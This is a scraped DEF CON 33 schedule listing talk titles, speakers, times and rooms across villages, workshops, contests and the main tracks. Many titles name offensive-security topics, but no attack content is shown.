Tengu Marauder v2 - DL
Testing Trust Relationships: Breaking Network Boundaries - BBV
The (Un)Rightful Heir: My dMSA Is Your New Domain Admin - DCT
The Ars0n Framework V2 Beta - BBV
The Beauty of Reversing Swift Malware - MWV
The challenges of Sub-dermal Payments - PAYV
The Cookie Heist: How Cybercriminals Are Outsmarting Chrome's Latest Defenses - MWV
The creation of the Malmongotchi badge - MWV
The depths that marketers will plummet to - CPV
The Devil Wears Headsets - SEV
The DOMino Effect: Automated Detection and Exploitation of DOM Clobbering Vulnerability at Scale - DCT
The Human Vulnerability: Social Engineering in a Hyper Connected World - SEV
The Missing Link: Draytek’s New RCEs Complete the Chain - HHV
The One Bitcoin Heist: Making a custom Hashcat module to solve a decade-old puzzle challenge - DCT
The Power(Point) Glove - HHV
The Quantum Shift: Practical Post-Quantum Risk: Algorithms, Infrastructure, and Transition - MWV
The Things know What You Did Last Session - IOTV
The Ultimate Hack: Applying Lessons Learned from the loss of TITAN to Maritime Cybersecurity - DCT
The Worst ICS/OT Love Story Ever Told - ICSV
The Year of the Bounty Desktop: Bugs from Binaries - BBV
There and Back Again: Discovering OT devices across protocol gateways - ICSV
TheTimeMachine - DL
TheTimeMachine - DL
They deployed Health AI on us. We’re bringing the rights & red teams. - BHV
Thinking Like a Hacker in the Age of AI - DCT
Third-Party Access Granted: A Postmortem on Student Privacy and the Exploit That’s Still in Production - PLV
Threat Dynamics on the Seas - MHV
To Pay or Not to Pay? The Battle Between Bug Bounty & Vulnerability Disclosure Programs - BBV
TotalTest 2.Oh!: Unleashing a Testing Program to Break Smarter, Measure Better, and Fund Your Fixes - ADV
Tracking 300k+ drives: What we’ve learned after 13 years - DDV
Tracking 300k+ drives: What we’ve learned after 13 years - DDV
TSPU: Russia's Firewall and Defending Against the Future of Digital Repression - DCT
Tunnelpocalypse - CRE
Turning Camera Surveillance on its Axis - DCT
Turning Microsoft's Login Page into our Phishing Infrastructure - DCT
Turning your Active Directory into the attacker’s C2: modern Group Policy Objects enumeration and exploitation - DCT
Uncovering the Secrets of Tire Pressure Monitoring Systems - CHV
Unexpected Connections: How a vulnerability in obscure dealer software could have unlocked your car from anywhere - DCT
Unmanned Wireless Penetration Testing Device - DL
Unmanned Wireless Penetration Testing Device - DL
Unmasking the Snitch Puck: the creepy IoT surveillance tech in the school bathroom - DCT
Unveiling IoT Vulnerabilities: From Backdoors to Bureaucracy - IOTV
Unveiling the shadows: Digital Forensics evidence in AI-Driven CyberCrime - MWV
Using Stardew Valley mods as a C2 and infostealer - MWV
VDP in Aviation - How it shouldn't be done! - ASV
Vector Space Manipulation in LLMs - RTV
Vibe School: Making dumb devices smart with AI - IOTV
Virtualization-Based (In)security - Weaponizing VBS Enclaves - DCT
Voice Cloning Air Traffic Control: Vulnerabilities at Runway Crossings - DCT
Voices from the Frontlines: Managing Bug Bounties at Scale - BBV
Voices of the Industry: A Fireside Chat with Payment Leaders - PAYV
VRP @ Google -- a look inside a large self-hosted VRP - BBV
WarHead - DL
WarHead - DL
Weaponizing Kestrel: Red Team Tradecraft for Hunting - RTV
Weaponizing Trust: Investigating a Threat Actor Targeting Security Researchers and Academics - DCT
Welcome to DEF CON 33! - DCT
What Europeans are doing right about cyber security - PLV
What Game Hackers teach us about Offensive Security and Red Teaming - GHV
What is Dead May Never Die: The Ghost of Internet Explorer in Windows: MapUrlToZone - DCT
What is Dead May Never Die: The Immortality of SDK Bugs - IOTV
What’s Really in the Box? The Case for Hardware Provenance and HBOMs - IOTV
Where’s My Crypto, Dude? The Ultimate Guide to Crypto Money Laundering (and How to Track It) - DCT
Whispers Through the Firewall: Data Exfiltration and C2 with Port Knocking - RTV
Whitebox Web Exploit Dev (WWED) - DCW
Wi-Fi-So-Serious - DCW
Win-DoS Epidemic: A crash course in abusing RPC for Win-DoS & Win-DDoS - DCT
Windows Payload Development: EDR Evasion and Initial Access Tradecraft - TRN
Windows Payload Development: EDR Evasion and Initial Access Tradecraft - TRN
You Can Mix but You Can’t Hide: Uncovering Node Behaviors in Nym Network - CPV
You snooze you lose: RPC-Racer winning RPC endpoints against services - DCT
Your Passkey is Weak: Phishing the Unphishable - PSV
Your Static Tools Are Cute - My AI Ripped ZebLoader Apart - MWV
Zero Trust, Total Bust - Breaking into thousands of cloud-based VPNs with one bug - DCT

Village Talk List

Friday 10:00 - 10:59 LHC First Time DEF CON Meetup 10:00 - 12:59 Sticker Swap 10:00 - 11:59 LHC Capture the Flag 13:15 - 13:59 Hard Hat Brigade Creations Q&A MrBill,M0nkeyDrag0n,Hydro . . . Saturday 10:00 - 12:59 Sticker Swap 10:00 - 11:59 LHC Capture the Flag 15:00 - 15:45 Hard Hat Brigade Organizer Panel MrBill,M0nkeyDrag0n,Hydro . . . Sunday 10:00 - 12:59 Sticker Swap

ADV - Adversary Village

Location: LVCCWest-Level1-Hall2-W702 - Map
Home Page: https://adversaryvillage.org


PDT Times Title speaker
Friday
11:00 - 11:45 From adversarial to aligned, redefining purple tea . . . Adam Pennington,Sydney Ma . . .
15:45 - 16:30 Adversarial mindset, thinking like an attacker is . . . Abhijith "Abx" B R,Keenan . . .
15:00 - 15:45 Adversaries at War: Tactics, technologies, and les . . . Gregory Carpenter,Barb Hi . . .
17:00 - 17:30 Of Stochastic Parrots and Deterministic Predators: . . . Bobby Kuzma,Michael Odell
Saturday
11:00 - 11:30 Malware in the gist: How malicious packages on npm . . . Paul McCarty
14:00 - 14:30 Blurred Lines of Cyber Threat Attribution: The Evo . . . Seongsu Park
15:30 - 15:59 Operational Twilight: APTs, OT, and the geopolitic . . . Cybelle Oliveira
15:00 - 15:30 Countering Forensics Software by Baiting Them Weihan Goh,Joseph Lim,Isa . . .
Sunday
11:00 - 11:30 Red Russians: How Russian APT groups closely follo . . . Will Thomas
11:00 - 11:30 Here and Now: Exploiting the Human Layer at the Ri . . . Daniel Isler
12:00 - 12:30 TotalTest 2.Oh!: Unleashing a Testing Program to B . . . Nebu Varghese
12:00 - 12:30 Letthemin: Facilitating High-Value Purple Teams Us . . . Sarah Hume

Return to Index

AIV - Artificial Intelligence Village

Location: LVCCWest-Level3-W314-W316 - Map
Home Page: https://aivillage.org/
DC Discord Chan: https://discord.com/channels/708208267699945503/732733090568339536


PDT Times Title speaker
Saturday
14:15 - 14:59 Assessing the Capabilities Gap Between Foundation . . . Justin W. Lin
16:30 - 17:15 Impact of Frontier AI on the Landscape of Cybersec . . . Dawn Song

Return to Index

ASV - Aerospace Village

Location: LVCCWest-Level1-Hall2-W503 - Map
Home Page: https://aerospacevillage.org/
DC Discord Chan: https://discord.com/channels/708208267699945503/732393044363444264


PDT Times Title speaker
Friday
15:00 - 15:30 VDP in Aviation - How it shouldn't be done! Matt Gaffney
16:30 - 16:59 Burning, trashing, spacecraft crashing: a collecti . . . Andrzej Olchawa,Milenko S . . .
17:00 - 17:30 Moonlight Defender - Purple Teaming in Space! Ben Hawkins
17:00 - 17:30 Satellite Networks Under Siege: Cybersecurity Chal . . . Roee Idan
Saturday
14:00 - 14:30 Red Teaming Space: Hacking the Final Frontier Tim Fowler
Sunday
10:00 - 10:59 Behind the Badge: How We Used and Abused Hardware . . . Adam Batori,Robert Paffor . . .
11:00 - 11:30 Hacking Space to Defend It: Generating IoBs with S . . . Brandon Bailey

Return to Index

BBV - Bug Bounty Village

Location: LVCCWest-Level3-W326 - Map
Home Page: https://bugbountydefcon.com/


PDT Times Title speaker
Friday
10:00 - 10:30 Secret Life of an Automationist: Engineering the H . . . Gunnar "g0lden" Andrews
10:00 - 10:59 Prompt. Scan. Exploit: AI’s Journey Through Zero . . . Diego "djurado" Jurado,Jo . . .
10:00 - 10:59 Becoming a Caido Power User Justin "rhynorater" Gardn . . .
11:00 - 11:59 Attacking AI Jason "jhaddix" Haddix
12:00 - 12:59 Voices from the Frontlines: Managing Bug Bounties . . . Gabriel Nitu,Jay Dancer,T . . .
12:00 - 12:59 Nuclei: Beyond The Basic Templates Ben "nahamsec" Sadeghipou . . .
13:30 - 14:30 Creator Panel Discussion Ben "nahamsec" Sadeghipou . . .
14:00 - 14:59 Securing Intelligence: How hackers are breaking mo . . . Dane Sherrets,Shlomie Lib . . .
14:30 - 15:30 Testing Trust Relationships: Breaking Network Boun . . . Michael Gianarakis,Jordan . . .
15:30 - 15:59 The Year of the Bounty Desktop: Bugs from Binaries Parsia "CryptoGangsta" Ha . . .
16:00 - 16:30 To Pay or Not to Pay? The Battle Between Bug Bount . . . Aaron "scriptingxss" Guzm . . .
16:30 - 16:59 Hacking the Edge: Real-World ESI Injection Exploit . . . Robert "nytr0gen" Vulpe
17:00 - 17:30 VRP @ Google -- a look inside a large self-hosted . . . Sam "erbbysam" Erb
17:30 - 17:59 Exploiting the Off-chain ecosystem in Web 3 Bug Bo . . . Bruno "BrunoModificato" H . . .
Saturday
10:00 - 10:59 Nuclei: Beyond The Basic Templates Ben "nahamsec" Sadeghipou . . .
10:00 - 10:59 The Ars0n Framework V2 Beta Harrison "rs0n" Richardso . . .
11:00 - 11:59 Magical Hacks Inti "intidc" De Ceukelai . . .
12:00 - 12:30 Sometimes you find bugs, sometimes bugs find you Jasmin "JR0ch17" Landry
12:00 - 12:59 From Component to Compromised: XSS via React creat . . . Nick Copi
13:00 - 13:59 Breaking the Chain: Advanced Offensive Strategies . . . Roni "lupin" Carta,Adnan . . .
13:00 - 14:30 Surfing through the Stream: Advanced HTTP Desync e . . . Martin "tincho_508" Doyhe . . .
15:00 - 15:30 Referral Beware, Your Rewards Are Mine Whit "un1tycyb3r" Taylor
15:00 - 16:30 Platform Panel about Triage Michelle Lopez,Michael "c . . .
16:30 - 17:30 Hacking the Graph: Advanced Target Discovery with . . . Jeff "caffix" Foley
17:30 - 17:59 Cheat Code for Hacking on T-Mobile: From Inside th . . . Elisa Gangemi
Sunday
10:00 - 10:59 Bug Bounty Village Social Hour
11:00 - 11:59 Hacker vs. Triage: Inside the Bug Bounty Battlegro . . . Richard "richeeta" Hyunho . . .
11:00 - 11:30 Hacking at Scale with AI Agents: Building an Auton . . . Vanshal Gaur
11:00 - 11:30 Full Disclosure, Full Color: Badge-making story of . . . Abhinav Pandagale
11:30 - 11:59 Portswigger Awards: Top 10 web hacking techniques . . . Portswigger
12:00 - 12:59 Bug Bounty Village CTF Walkthrough CTF.ae
13:00 - 13:30 Bug Bounty Village CTF Awards Bug Bounty Village Staff, . . .
13:30 - 13:59 Bug Bounty Village Closing Ceremony Bug Bounty Village Staff

Return to Index

BHV - Bio Hacking Village

Location: LVCCWest-Level1-Hall2-W606 - Map
Home Page: https://www.villageb.io/
DC Discord Chan: https://discord.com/channels/708208267699945503/735273390528528415


PDT Times Title speaker
Friday
10:30 - 10:59 Quantum-Resistant Healthcare Katarina Amrichova
11:00 - 15:59 accessDenied: Step Into the Scenario. Deal the Con . . . Jack Voltaic
13:45 - 14:30 Digital Casualties: Documenting Cyber-Induced Pati . . . Jorge Acevedo Canabal,Sco . . .
16:00 - 16:30 Bio-Cryptography is the Game-Genie in a post quant . . . James Utley
17:00 - 17:30 They deployed Health AI on us. We’re bringing th . . . Andrea Downing
17:30 - 17:59 How AI + Hardware can Transforming Point-of-Care W . . . PamirAI
Saturday
11:00 - 13:59 Operation Europa Crisis: A Tabletop Simulation Nathan Case
11:00 - 15:59 accessDenied: Step Into the Scenario. Deal the Con . . . Jack Voltaic
15:00 - 15:30 Digital First Responders: Fixing Patient Safety G . . . Jennifer Schieferle Uhlen . . .
Sunday
11:30 - 11:59 Bare Metal Reverse Engineering SolaSec
11:30 - 11:59 ​​Introducing CIPHER: The Open-Source Platform . . . Isabel Straw

Return to Index

CHV - Car Hacking Village

Location: LVCCWest-Level1-Hall2-W602 - Map
Home Page: https://www.carhackingvillage.com/
DC Discord Chan: https://discord.com/channels/708208267699945503/732722838942777474


PDT Times Title speaker
Friday
12:30 - 12:59 How API flaws led to admin access to over 1,000 US . . . Eaton Zveare
14:30 - 14:59 Modern Odometer Manipulation collin,oblivion
16:00 - 16:30 Hacking a head unit with malicious PNG Danilo Erazo
16:30 - 16:59 Context Aware Anomaly Detection in Automotive CAN . . . Ravi Rajput
16:30 - 16:59 Smart Bus Smart Hacking: From Free WiFi to Total C . . . Chiao-Lin "Steven Meow" Y . . .
Saturday
13:00 - 13:30 Uncovering the Secrets of Tire Pressure Monitoring . . . Yago Lizarribar
17:00 - 17:59 One Modem to Brick Them All: Exploiting Vulnerabil . . . Marcell Szakály,Sebastia . . .
Sunday
10:00 - 10:59 Blind Trailer Shouting Ben Gardiner

Return to Index

CON - Contests

Home Page: https://defcon.outel.org/dcwp/dc33/activities/contests-list/
Sched Page: https://defcon.outel.org/defcon33/dc33-consolidated_page.html#villist_CON


PDT Times Title speaker
Thursday
12:00 - 12:59 Hac-Man - Remote play available
Friday
10:00 - 11:59 Aw, man...pages!
10:00 - 17:59 Hac-Mac Contest Booth Open
12:00 - 16:59 Kubernetes Learning CTF (Non-competitive) w/ Suppo . . .
13:00 - 14:59 Pub Quiz at DEF CON
19:00 - 20:59 AI Art Battle
20:00 - 21:59 Hacker Jeopardy
22:30 - 00:30 Whose Slide Is It Anyway?
Saturday
10:00 - 11:59 DEF CON Beard and Mustache Contest
10:00 - 16:59 Kubernetes Learning CTF (Non-competitive) w/ Suppo . . .
10:30 - 17:30 Kubernetes Competitive CTF
10:00 - 17:59 Hac-Mac Contest Booth Open
10:00 - 10:59 The Pwnie Awards
13:00 - 14:59 Taskmooster
16:00 - 17:59 Hack3r Runw@y Contest
19:00 - 21:59 EFF Tech Trivia
20:00 - 21:59 Hacker Jeopardy
22:30 - 00:30 Feet Feud (Hacker Family Feud)
Sunday
10:00 - 11:59 Kubernetes Learning CTF (Non-competitive) w/ Suppo . . .
10:00 - 12:59 Hac-Mac Contest Booth Open
12:00 - 12:59 Hac-Man - Remote play available
12:00 - 12:59 Hac-Man - Remote play available
12:00 - 12:59 Hac-Man - Remote play available

Return to Index

CPV - Crypto Privacy Village

Location: LVCCWest-Level1-Hall1-W403 - Map
Home Page: https://cryptovillage.org/
DC Discord Chan: https://discord.com/channels/708208267699945503/732734002011832320


PDT Times Title speaker
Friday
10:00 - 10:05 Crypto Privacy Village: Welcome Crypto Privacy Village St . . .
12:00 - 12:59 Behind The Dashboard - (Lack Of) Automotive Privac . . . Lior ZL,Jacob Avidar
12:30 - 12:59 Back to Basics: Building Resilient Cyber Defenses Yael Grauer
13:00 - 13:59 A Tale of Weeds and Roses: Propagating the Right D . . . Irene Mo,Alyssa Coley
14:30 - 14:59 QRAMM: The Cryptographic Migration to a Post-Quant . . . Emily Fane,Abdel Sy Fane
16:30 - 16:59 The depths that marketers will plummet to 4dw@r3
Saturday
10:00 - 10:05 Crypto Privacy Village: Welcome Crypto Privacy Village St . . .
10:00 - 10:59 Gold Bug: Puzzle Panel with Friends
11:00 - 11:59 Illuminating the Dark Corners of AI: Extracting Pr . . . Patrick Walsh
12:00 - 12:59 Cracking Chaos: Making, Using, and Breaking PRNGs 1nfocalypse
Sunday
10:30 - 10:45 Intro to Ciphers [Mini Workshop/Talk] Crypto Privacy Village St . . .
10:00 - 10:05 Crypto Privacy Village: Welcome Crypto Privacy Village St . . .
10:00 - 10:30 Escaping the Privacy Sandbox with Client-Side Dean . . . Eugene "spaceraccoon" Lim
11:00 - 11:30 You Can Mix but You Can’t Hide: Uncovering Node . . . Alexis Cao
12:30 - 12:59 Crypto Privacy Village: Closing Remarks Crypto Privacy Village St . . .

Return to Index


PDT Times Title speaker
Friday
10:00 - 11:50 AML Cryptocurrency Compliance Joseph,Chelsea Button
10:00 - 17:59 WipeOut XL hi-score tournament
10:00 - 17:59 Career Fair: Interview Tips and Referral Krity Kharbanda,Aastha Sa . . .
10:15 - 10:59 Silent Sabotage: How Nation-State Hackers Turn Hum . . . Nathan Case,Jon McCoy
10:00 - 17:59 Memorial Chamber Open
11:00 - 11:59 Cryptocurrency Opening Keynote Michael "MSvB" Schloh von . . .
12:00 - 13:50 Red Teaming Financial Defenses Wei Hong,Chloe Chong
12:00 - 12:59 Tunnelpocalypse Rich Compton
13:00 - 13:59 Rebuild The World: Access to secure software depen . . . Tom Berek,Farid Zakaria,D . . .
14:00 - 15:50 Evolution and History of Drain and Approval Attack . . . utvecklas,George
14:00 - 14:30 Off-Grid Datarunning in Oppresive Regimes: Sneaker . . . Robert "LambdaCalculus" M . . .
14:45 - 15:30 Introduction of Loong Community & Financial Identi . . . Noel Wong,KC Wong
15:30 - 16:30 EFF/Hackers.town RayHunter build clinic
15:30 - 15:59 Grind vs Gleam: Building Reddit's DDoS Resilience Pratik Lotia,Spencer Koch
16:00 - 17:50 Applied Cryptocurrency Hardware Param D Pithadia,Michael . . .
16:30 - 16:59 Quiet Confidence: An Introvert's Journey to Techni . . . Emma Fang
17:00 - 17:59 Badgelife: Lessons from Years of Do’s, Don’ts, . . . Abhinav Pandagale,MakeItH . . .
Saturday
10:00 - 11:50 Cryptocurrency Enforcement Actions Veronika,Chelsea Button
10:00 - 17:59 Career Fair: Resume Review Ruchira Pokhriyal,Harini . . .
10:15 - 10:59 Private, Private, Private: Access Everywhere Meghan Jacquot
10:00 - 17:59 Memorial Chamber Open
11:00 - 11:59 Cryptocurrency Weekend Keynote Chelsea Button,Nick "c7fi . . .
12:00 - 13:50 Hacking Custody and Exchanges Sky Gul,Andrea
12:00 - 12:59 Rayhunter Internals oopsbagel,Cooper "CyberTi . . .
12:00 - 12:59 DDoS: The Next Generation Andrew Cockburn
14:00 - 15:50 Oblivious Access to Blockchains Elaine Shi,Afonso Tinoco
14:30 - 14:59 #ReclaimTech - A community movement Janet Vertesi,Andy Hull
14:00 - 14:30 Surviving the Dataclysm: Resistance through Resili . . . Rebecah Miller
14:00 - 14:30 Tech Reclaimers
16:00 - 17:50 Cryptocurrency Nodes and Relays Diego "rehrar" Salazar,Da . . .
17:00 - 17:59 Breaking In: Real Paths Into Cybersecurity from Ha . . . Eva Benn,Rosie "Lady Cybe . . .
Sunday
10:00 - 11:50 Let's Break Enigma! Rigo Salazar,Luke Szramow . . .
10:00 - 13:59 Memorial Chamber Open
11:00 - 11:45 Creating Integrated Threat Surveillance: AI + OSIN . . . Desiree Wilson
12:00 - 13:50 Self Custodial Wallet Use HalFinneyIsMyHomeBoy
12:00 - 12:59 Passing the Torch: Mentoring and Protecting Our St . . . Sam Comini,Navaar Johnson

Return to Index

DCG - DEF CON Groups



PDT Times Title speaker
Saturday
13:00 - 13:59 DEF CON Groups (DCGs): Keeping the Signal Alive Al . . . Adam915,Jayson E Street,A . . .

Return to Index


PDT Times Title speaker
Friday
10:00 - 10:20 Welcome to DEF CON 33! Jeff "The Dark Tangent" M . . .
10:30 - 11:15 DC101 Panel
10:00 - 10:45 Remote code execution via MIDI messages Anna portasynthinca3 Anto . . .
10:00 - 10:45 BitUnlocker: Leveraging Windows Recovery to Extrac . . . Alon "alon_leviev" Leviev . . .
10:00 - 10:20 Paywall Optional: Stream for Free with a New Techn . . . Farzan Karimi
10:30 - 11:15 No VPN Needed? Cryptographic Attacks Against the O . . . Tom Tervoort
10:00 - 10:45 The One Bitcoin Heist: Making a custom Hashcat mod . . . Joseph "stoppingcart" Gab . . .
11:00 - 11:45 Virtualization-Based (In)security - Weaponizing VB . . . Ori David
11:30 - 12:15 ChromeAlone: Transforming a Browser into a C2 Plat . . . Michael "bouncyhat" Weber
11:00 - 11:45 Inside Look at a Chinese Operational Relay Network Michael "mtu" Torres,Zane . . .
12:30 - 13:15 Ghosts in the Machine Check - Conjuring Hardware F . . . Christopher "xoreaxeaxeax . . .
12:00 - 12:45 Ghost Calls: Abusing Web Conferencing for Covert C . . . Adam "UNC1739" Crosser
12:00 - 12:45 Safe Harbor or Hostile Waters: Unveiling the Hidde . . . Ji'an "azraelxuemo" Zhou, . . .
12:30 - 13:15 Cash, Drugs, and Guns: Why Your Safes Aren't Safe Mark Omo,James Rowley
12:00 - 12:20 The Ultimate Hack: Applying Lessons Learned from t . . . Rear Admiral John Mauger
12:30 - 13:15 Edge of Tomorrow: Foiling Large Supply Chain Attac . . . Maksim Shudrak
13:30 - 14:15 Recording PCAPs from Stingrays With a $20 Hotspot Cooper "CyberTiger" Quint . . .
13:00 - 13:45 What is Dead May Never Die: The Ghost of Internet . . . George Hughey,Rohit Mothe
13:00 - 13:45 Advanced Active Directory to Entra ID lateral move . . . Dirk-jan Mollema
13:30 - 14:15 Dead Made Alive Again: Bypassing Intent Destinatio . . . Qidan "flanker_hqd" He
13:30 - 14:15 Weaponizing Trust: Investigating a Threat Actor Ta . . . Christophe Tafani-Dereepe . . .
14:00 - 14:45 DisguiseDelimit: Exploiting Synology NAS with Deli . . . Ryan Emmons
14:00 - 14:45 You snooze you lose: RPC-Racer winning RPC endpoin . . . Ron Ben Yizhak
14:30 - 15:15 Siri-ously Leaky: Exploring Overlooked Attack Surf . . . Richard "richeeta" Hyunho . . .
14:30 - 15:15 Firewalls Under Fire: China's 5+ year campaign to . . . Andrew "Spike" Brandt
15:30 - 16:15 Mastering Apple's Endpoint Security for Advanced m . . . Patrick Wardle
15:00 - 15:45 Gateways to Chaos - How We Proved Modems Are a Tic . . . Chiao-Lin "Steven Meow" Y . . .
15:00 - 15:45 From Spoofing to Tunneling: New Red Team's Network . . . Shu-Hao, Tung 123ojp
15:30 - 16:15 Unmasking the Snitch Puck: the creepy IoT surveill . . . Reynaldo "buh0",nyx
15:30 - 16:15 So Long, and Thanks for All the Phish Harrison Sand,Erlend Leik . . .
16:30 - 17:15 HTTP/1.1 Must Die! The Desync Endgame James "albinowax" Kettle
16:00 - 16:45 The (Un)Rightful Heir: My dMSA Is Your New Domain . . . Yuval Gordon
16:00 - 16:45 Infecting the Boot to Own the Kernel: Bootkits and . . . Alejandro "TheMalwareGuar . . .
16:30 - 17:15 Escaping the Privacy Sandbox with Client-Side Dean . . . Eugene "spaceraccoon" Lim
16:30 - 16:50 Killing Killnet Alex Holden
17:30 - 17:50 Rusty pearls: Postgres RCE on cloud databases Tal "TLP" Peleg,Coby Abra . . .
17:00 - 17:45 Orion - fuzzing workflow automation Max Bazalii,Marius Fleisc . . .
17:00 - 17:45 Emulating Embedded Linux Devices at Scale with Lig . . . Sigusr Polke
17:30 - 17:50 Silent Leaks: Harvesting Secrets from Shared Linux . . . Cernica Ionut Cosmin
17:00 - 17:45 Building a Malware Museum Mikko Hypponen
Saturday
10:00 - 10:45 AppleStorm - Unmasking the Privacy Risks of Apple . . . Yoav Magid
10:00 - 10:20 Turning Camera Surveillance on its Axis Noam Moshe
10:30 - 11:15 One Modem to Brick Them All: Exploiting Vulnerabil . . . Marcell Szakály,Jan "SP3 . . .
10:00 - 10:20 Binary Facades: Reversing approaches to extract em . . . Patrick Wardle
10:30 - 11:15 Kill Chain Reloaded: Abusing legacy paths for stea . . . Alejandro "0xedh" Hernand . . .
10:00 - 10:45 Where’s My Crypto, Dude? The Ultimate Guide to C . . . Thomas "fr0gger_" Roccia
11:00 - 11:45 How to secure unique ecosystem shipping 1 billion+ . . . Adam "pi3" Zabrocki,Marko . . .
11:00 - 11:45 The DOMino Effect: Automated Detection and Exploit . . . Zhengyu Liu,Jianjia Yu
11:30 - 12:15 Breakin 'Em All – Overcoming Pokemon Go's Anti-C . . . Tal Skverer
11:30 - 12:15 Original Sin of SSO: macOS PRT Cookie Theft & Entr . . . Shang-De "HackerPeanutJoh . . .
11:00 - 11:45 Man-in-the-Malware: Intercepting Adversarial Commu . . . Ben "polygonben" Folland
12:00 - 12:45 Client or Server? The Hidden Sword of Damocles in . . . Ji'an "azraelxuemo" Zhou, . . .
12:00 - 12:45 Help! Linux in my Webcam! (•_•) Mickey Shkatov,Jesse Mich . . .
12:30 - 13:15 Claude--Climbing a CTF Scoreboard Near You Keane Lucas
12:30 - 13:15 Diamonds Are For Hackers - Building the first full . . . Mark "LargeCardinal" Carn . . .
12:00 - 12:45 Not Just a Pipeline Leak: Reconstructing the Real . . . Aviad Hahami
13:00 - 13:45 Hackers Dropping Mid-Heist Selfies: LLM Identifies . . . Olivier Bilodeau,Estelle . . .
13:00 - 13:45 Thinking Like a Hacker in the Age of AI Richard "neuralcowboy" Th . . .
13:30 - 14:15 One Key, Two Key, I Just Stole Your goTenna Key Erwin "Dollarhyde" Karinc . . .
13:30 - 14:15 CTRAPS: CTAP Impersonation and API Confusion Attac . . . Marco Casagrande,Daniele . . .
13:00 - 13:45 Stories from a Tor dev Roger "arma" Dingledine
14:00 - 14:20 RATs & Socks abusing Google Services Valerio "MrSaighnal" Ales . . .
14:30 - 14:50 HaKCing OBD-II Emissions Testing Archwisp
14:00 - 14:45 Rebadged, Relabeled, and Rooted: Pwnage via the So . . . Anthony "Coin" Rose,Jake . . .
14:30 - 15:15 ReVault! Compromised by your Secure SoC Philippe "phLaul" Laulher . . .
14:30 - 16:15 Ask EFF Hannah Zhao,Alexis Hancoc . . .
14:00 - 14:45 TSPU: Russia's Firewall and Defending Against the . . . Benjamin "bmixonbaca" Mix . . .
15:00 - 15:45 Browser Extension Clickjacking: One Click and Your . . . Marek Tóth
15:00 - 15:20 Shaking Out Shells with SSHamble HD Moore
15:30 - 16:15 Metal-as-a-Disservice: Exploiting Legacy Flaws in . . . Bill Demirkapi
15:30 - 16:15 Zero Trust, Total Bust - Breaking into thousands o . . . David "johnnyspandex" Cas . . .
15:00 - 15:45 Ghosts of REvil: An Inside Look with the Hacker Be . . . Jon DiMaggio,John Fokker
16:00 - 16:45 Turning Microsoft's Login Page into our Phishing I . . . Keanu "RedByte" Nys
16:30 - 17:15 Direct Memory, Access Everywhere Joe "securelyfitz" FitzPa . . .
16:30 - 17:15 De-Virtualizing the Dragon: Automated Unpacking an . . . Agostino "Van1sh" Panico
16:30 - 17:15 7 Vulns in 7 Days: Breaking Bloatware Faster Than . . . Leon "leonjza" Jacobs
16:00 - 16:45 "We are currently clean on OPSEC": The Signalgate . . . Micah "micahflee" Lee
17:00 - 17:45 Blind Trailer Shouting Ben Gardiner
17:30 - 17:50 Hacking Hotspots: Pre-Auth Remote Code Execution, . . . Edward "Actuator" Warren
17:30 - 17:50 Voice Cloning Air Traffic Control: Vulnerabilities . . . Andrew "Helicopters of DC . . .
17:30 - 17:50 OverLAPS: Overriding LAPS Logic Antoine Goichot
17:00 - 17:45 Amber64: Mining Hacker History from Over Half a Mi . . . Wesley McGrew
Sunday
10:00 - 10:45 Invitation Is All You Need! Invoking Gemini for Wo . . . Ben Nassi,Or "oryair1999" . . .
10:00 - 10:45 SSH-nanigans: Busting Open the Mainframes Iron For . . . Philip "Soldier of FORTRA . . .
10:00 - 10:20 From Shanghai to the Shore: The Silent Threat in G . . . Kenneth Miltenberger,Nich . . .
10:30 - 11:15 Can't Stop the ROP: Automating Universal ASLR Bypa . . . Bramwell Brizendine
10:00 - 10:20 Mind the Data Voids: Hijacking Copilot Trust to De . . . Tobias "ItsSixtyNein" Die . . .
10:30 - 11:15 Jailbreaking the Hivemind: Finding and Exploiting . . . Agostino "Van1sh" Panico
10:00 - 10:45 Cyber Volunteering and Community Defense - DEF CON . . . Sarah Powazek,Jake Braun, . . .
11:00 - 11:45 Playing Dirty Without Cheating - Getting Banned fo . . . Sam Collins,Marius Muench . . .
11:00 - 11:45 Journey to the center of the PSTN: How I became a . . . Enzo Damato
11:30 - 12:15 Passkeys Pwned: Turning WebAuthn Against Itself Shourya Pratap Singh,Jonn . . .
11:30 - 12:15 Breaking Wi-Fi Easy Connect: A Security Analysis o . . . George "sophron" Chatziso . . .
11:00 - 11:45 Kill List: Hacking an Assassination Site on the Da . . . Carl Miller,Chris Monteir . . .
12:00 - 12:45 Phrack Panel
12:00 - 12:45 Turning your Active Directory into the attacker’ . . . Quentin "croco_byte" Rola . . .
12:30 - 13:15 Win-DoS Epidemic: A crash course in abusing RPC fo . . . Or "oryair1999" Yair,Shah . . .
12:30 - 13:15 Silent Signals: Exploiting Security and Privacy Si . . . Gabriel Gegenhuber,Maximi . . .
12:00 - 12:45 Carding, Sabotage & Survival: A Darknet Market Vet . . . Godman666
13:30 - 13:50 Planting C4: Cross-Compatible External C2 for All . . . Scott "ScottCTaylor12" Ta . . .
13:30 - 14:15 SCCM: The tree that always bears bad fruits Mehdi "kalimer0x00" Elyas . . .
13:00 - 13:45 Unexpected Connections: How a vulnerability in obs . . . Eaton Zveare,Roshan Piyus . . .
13:30 - 14:59 Contest Closing Ceremonies & Awards
14:00 - 14:20 Loading Models, Launching Shells: Abusing AI File . . . Cyrus Parzian
14:00 - 14:20 How to Fake a Badge like a Pro: 11 Tips to Counter . . . Russell Phillips
15:00 - 17:59 DEF CON Closing Ceremonies & Awards Jeff "The Dark Tangent" M . . .

Return to Index


PDT Times Title speaker
Friday
09:00 - 12:59 Whitebox Web Exploit Dev (WWED) Cale "calebot" Smith,Luke . . .
09:00 - 12:59 Effectively Detecting Modern Malware with Volatili . . . Andrew Case,Lauren Pace,D . . .
09:00 - 12:59 Open Source Malware 101 - Everything you always wa . . . Paul "6mile" McCarty
09:00 - 12:59 Introduction to Cryptographic Attacks Matt Cheung
09:00 - 12:59 Inside the Threat: Designing and Deploying Malicio . . . Or Eshed,Aviad Gispan
09:00 - 12:59 Accelerating Malware Analysis with WinDbg Time Tra . . . Joshua "jstrosch" Strosch . . .
09:00 - 12:59 SnowGoat: Exposing Hidden Security Risks and Leaki . . . Lior Adar,Chen Levy Ben A . . .
09:00 - 12:59 Medical Device Hacking: 201 Michael "v3ga" Aguilar,Al . . .
14:00 - 17:59 Contextualizing alerts with relevant logs and even . . . Ezz Tahoun
14:00 - 17:59 64-bit Intel Assembly Language Programming for Hac . . . Wesley McGrew
14:00 - 17:59 PLC Playground: Hands-On Industrial Control System . . . Anthony "Coin" Rose,Danie . . .
